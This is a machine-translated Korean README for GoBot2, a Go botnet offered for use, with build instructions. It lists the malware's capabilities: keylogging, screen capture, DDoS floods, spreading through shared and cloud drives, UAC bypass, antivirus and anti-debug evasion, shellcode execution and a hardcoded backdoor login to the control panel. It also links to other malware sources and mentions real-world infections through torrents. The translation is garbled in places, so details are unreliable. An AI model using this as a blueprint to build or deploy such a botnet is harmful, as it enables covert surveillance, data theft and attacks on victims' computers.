새로운 프로젝트 : https://github.com/saturnsvoid/project-whis
gobot2
다른 사용자가 봇넷을 기반으로하는 것을 본 후에는 내 Gobot에서 더 많은 작업을하고 싶었지만 조금 더 만들었습니다. 이것에는 문제가 있지만 고급 POC가 더 많습니다 .... 나는 좋은 코더가 아니지만 온라인으로 기본적인 독서를 할 수있었습니다. 이 프로젝트와 더 많은 일을하고 싶었지만 멈췄다. 나는 맬웨어와 바이러스를 만들지 않고있다. 나는 더 많은 합법적 인 것들로 넘어갈 것이다. 비록 나는 내 옛 프로젝트 중 일부를 내 github에 게시 할 것이지만, 대부분의 마녀는 악의적입니다. 나는 '좋은 사람'이 그들과 싸우고 친족과 싸우기 위해 더 간단하게 만들기 위해 여기에두고 있습니다.
C & C 기능 :
- GO에 작성되었습니다
- 크로스 플랫폼
- 정보는 SQL 데이터베이스입니다
- 보안 로그인 시스템
- 하드 코딩 된 로그인 시스템
- HTML 및 CSS C & C를 사용하기 간단합니다
- 콘솔 기반 C & C
- 타이트한 보안 (PHP 없음!)
- 인코딩 및 난독 화 된 데이터
- HTTP 또는 HTTP
- 단일, 선택된 모든 명령 발행
- 사용자 에이전트 감지
- 더
봇 기능
- 안전한 오류 처리
- 무제한 패널이 있습니다
- 인코딩 및 난독 화
- HTTPS 또는 HTTP를 사용하십시오
- Old (> 24hr) 명령 처리 (오래된 명령을 실행하지 마십시오!)
- PowerShell 스크립트 실행 (URL을 통해 허용되는 매개 변수)
- 고급 토런트 시드기 (Utorrent, Bittorrent Auto 클라이언트 다운로드 및 필요한 경우 숨겨진 실행)
- 드라이브 스프레더 (이름 목록 포함)
- Dropbox 스프레더 (이름 목록 포함)
- Google 드라이브 스프레더 (이름 목록 포함)
- OneDrive 스프레더 (이름 목록 포함)
- Advanced Keylogger (모든 키, 창 제목, 클립 보드, AutostArt, +more를 처리합니다)
- 시스템 정보 (IP, WiFi, 사용자, AV, IpConfig, CPU, GPU, Sysinfo, 설치된 소프트웨어, .NET 프레임 워크, 리프레셔)
- 스크린 캡처 (압축, 타임 캡처, +more)
- 다운로드 및 실행 (MD5 HASH Check, URL 또는 Base64, 매개 변수, UAC 바이 패스, 영역 리무버)
- DDOS 방법 (스레드 /w 간격, httpget, tcpflood, udpflood, slowloris, hulk, tlsflood, 대역폭 배수구, Goldeneye, Ace)
- 봇 업데이트 (MD5 해시 체크, 관리자, 구역 리무버)
- UPNP (열린 TCP/UDP 포트)
- Web-Server (Auto-Upnp Port 80, 무제한 페이지 추가/편집)
- Windows 방화벽에 프로그램을 추가하십시오
- 호스트 파일 편집기 (백업 및 복원, 실행 중 교체, DNS Flusher)
- 원격 CMD
- 관리 권한을 감지합니다
- 봇 ID 생성 (동일하지 않음)
- 고급 안티 바이러스 우회 (임의의 메모리 할당, 핵 홉, 지연, 런타임로드 DLLS /W OBF, 랜덤 연결 시간, + more)
- Advanced Anti-Debug (IsdebuggerPresent, Proc Detection, IP 조직 감지, 파일 이름 탐지, 반응 시스템)
- 단일 인스턴스 시스템
- 리버스 HTTP 프록시 (Conf. Port, 백엔드 서버)
- 활성 방어 (활성 레지스트리 방어, 활성 파일 방어, 활성 워치 독 + 더)는 죽이기를 원하지 않습니다.
- UAC 바이 패스 (Windows 10 Pro 64 비트의 모든 버전 및 현재 버전 작업)
- 고급 설치 시스템 (동적 레지스트리 키, 동적 파일 이름, 관리 권한 유지, 캠페인 타겟팅 (허용 국가에서만 설치), 구역 리무버, 방화벽에 자체 추가)
- 시스템 제거 시스템 (모든 흔적 제거)
- 스크립터 (Batch, HTML, VBS, PS)
- ShellCode 실행 (ThreadExecute)
- 전원 옵션 (종료, 다시 시작, 로그 오프)
- 시작 오류 메시지
- MessageBox (반환 답장)
- 오픈 웹 사이트 (Visible/Hidden)
- 홈페이지를 변경하십시오
- 배경 변경 (URL 또는 Base64)
- .exe run (UAC 바이 패스 최적)
- 자아를 죽입니다
- Proc가 실행 중인지 확인하십시오
- 프로세스 /W 활성 모드를 숨기십시오
- 비활성화/활성화 (Taskmanger, Rededit, Command Prompt)
- File Dropper ( /w /w dir 선택에서 얻은 흔적이없는 PC에 배치)
C & C에 대한 일부 정보
C & C는 프로그램이며 Windows, Linux, Mac 시스템 용으로 컴파일 할 수 있습니다. 설정에서 선택한 포트의 모든 연결을 처리하는 자립하는 웹 서버입니다. HTLM C & C를 허용하고 계정, 봇 및 명령에 대한 데이터를 SQL 데이터베이스 및 봇 파일 (스크린 샷, 키 로그, ECT)으로 봇 자체 "프로파일"아래 파일로 저장합니다.
프로그램에서 봇넷을 제어하거나 HTML C & C에서 제어 할 수 있습니다. C & C의 프로그램은 매우 안정적이며, GO 기반 서버는 수백만을 처리하거나 한 번에 요청을 실패하지 않고 알고 있습니다. 연결이 양호한 지 확인하십시오.
C & C에는 계정 로그인을 '잊어 버렸을 때 사용할 수있는 하드 코딩 된 로그인 (백도어와 같은)이 빌드되어 있습니다. C & C는 여러 계정을 가질 수 있습니다.
자체 포함 된 프로그램이므로 C & C에 대한 SQLI 공격 문제를 제거하므로 더 안전합니다.
C & C는 오른쪽으로 구성된 경우 Tor Hidden Service 내부에서 실행될 수 있으며 클라이언트 (BOT)가 필요한 경우 Onion.to 또는 Onion.cab 전급차를 사용하여 Client (BOT)를 연결할 수 있습니다. Tor는 양말 프록시를 통해 봇에서 사용할 수 있습니다.
구축 및 사용 방법
봇 설정은 "변수"에 있습니다. 서버 설정은 "Server.go"에 있습니다.
올바른 설정으로 gobot.go를 컴파일하고 MySQL 데이터베이스를 만들고 DB 파일을 가져오고 올바른 설정으로 Server.go를 컴파일하십시오.
- Go Build -o gobot.exe -ldflags "-h windowsgui" "c : gobot2 gobot.go"
- Go Build -0 Server.exe "C : GoBot2 Console Server Server.go"
항상 '-w -s'ldflags로 컴파일하여 이진에서 디버그 정보를 제거하십시오.
도구 포함
- 프로젝트를위한 도구 (vb.net의 소스 w/ source w/ source.
- downloader.go (Golang 다운로드 및 실행 예제)
- Downloaderwithuac.go (Golang 다운로드 및 실행 예제 UAC 바이 패스)
oppuscator
그것은 실제로 char +1을 a = b, c = d, ect로 이동시키는 모든 난독자가 아닙니다. 간단하지만 프로그램을 엉망으로 만들고 싶어하는 사람들과 키워드를 검색하는 프로그램도 속도를 늦출 것입니다.
사용 된 패키지
- github.com/nebulouslabs/go-upnp
- golang.org/x/sys/windows/registry
- github.com/allendang/w32
- github.com/atotto/clipboard
- github.com/stackexchange/wmi
이미지
- http://prnt.sc/d67nh5
- http://prnt.sc/d67ogh
- http://prnt.sc/d67oqh
- http://prnt.sc/d6esj3
크레딧과 물건
- https://github.com/decred/gominer
- https://github.com/robvanmieghem/gominer
- https://astaxie.gitbooks.io/build-web-application-with-golang/content/04.5.html
- http://www.adlice.com/runpe-hide-code-behind-legit-process/
- http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- https://mholt.github.io/json-to-go/
- https://sentinelone.com/blogs/anti-vm-tricks/
- http://hackforums.net/showthread.php?tid=5383448
- https://github.com/grafov/hulk
- https://github.com/nhooyr/dos
- https://github.com/marcelki/sockstress
- https://github.com/ammario/ssynflood
- https://github.com/matishsiao/goinfo/blob/master/goinfo_windows.go
- https://github.com/iamacarpet/go-win64api
- https://github.com/oneumyvakin/initme/blob/master/windows.go
- https://github.com/lolsquad/ddos-scripts
- https://github.com/vbooter/ddos-scripts
- https://github.com/natefinch/pie
- https://www.windows-commandline.com/enable-remote-desktop-command-line/
- https://www.socketloop.com/tutorials/golang-secure-connection-between-server-and-client
- https://github.com/lextoumbourou/goodhosts
- https://github.com/yinandyangsecurityawareness/dreamr-botnet
- https://github.com/mauri870/ransomware
- http://www.devdungeon.com/content/making-tor-http-requests-go
- http://www.darul.io/post/2015-07-22_go-lang-simple-reverse-proxy
- https://github.com/mauri870/powershell-reverse-http
- https://github.com/gh0std4ncer/lizkebab/blob/master/client.c
- https://github.com/egebalci/egesploit
- https://github.com/egebalci/hercules
- https://github.com/andrewaeva/gobotnet
- https://github.com/saturnsvoid/gobot
- https://github.com/petercunha/goat
- https://github.com/huin/goupnp
- https://github.com/ytisf/thezoo/tree/master/malwares/source/original
- https://github.com/malwares/remote-access-trojan
- https://github.com/kardianos/service
- https://github.com/vova616/screenshot/blob/master/screenshot_windows.go
- http://hackforums.net/showthread.php?tid=5040543
- http://www.calhoun.io/5-useful-ways-to-us-closures-in-go/
- https://blogs.technet.microsoft.com/ilikesql_by_dandyman/2013/03/10/how-to-install-a-msi-file-unattended/
- https://github.com/tadzik/simpleaes
- https://guitmz.com/win32-liora-b/
- https://github.com/rk/go-cron
- https://breakingmalware.com/vulnerabilities/elastic-boundaries-elevating-privileges-by- 환경-Variables-expansion/
- https://breakingmalware.com/malware/ardbot-a-malware-under-construction/
- https://breakingmalware.com/malware/furtim-malware-avoids-mass-infection/
- https://www.pugetsystems.com/labs/support-software/how-to-disable-sleep-mode-or-hibernation-793/
- https://files.sans.org/summit/digital_forensics_and_incident_response_summit_2015/pdfs/theresmethingaboutwmidevonkerr.pdf
- https://github.com/jasonlvhit/gocron
다른
Go는 놀랍고 강력한 프로그래밍 언어입니다. 아직하지 않았다면 확인하십시오. https://golang.org/
기부
비트 코인 주소로 기부하십시오 : 1aeb1utjayu3sgtbkzcljmrr5rs7bp7ee
소식
방금 블리핑 컴퓨터에 관한 기사를 읽었습니다. https://www.bleepingcomputer.com/news/security/backdoored-torrents-infect-movie-tv-fans-with-gobot2-malware/ 누군가 가이 프로젝트에 사용 된 것을 발견 한 것 같습니다 ... 나는이 그룹이나 사람과 관련이 없습니다. 나는이 문제에 대해 더 이상 할 말이 없다.
-크랩 게
---------- 업데이트 로그 ---------------------
03/15/2017 : Intial Upload ...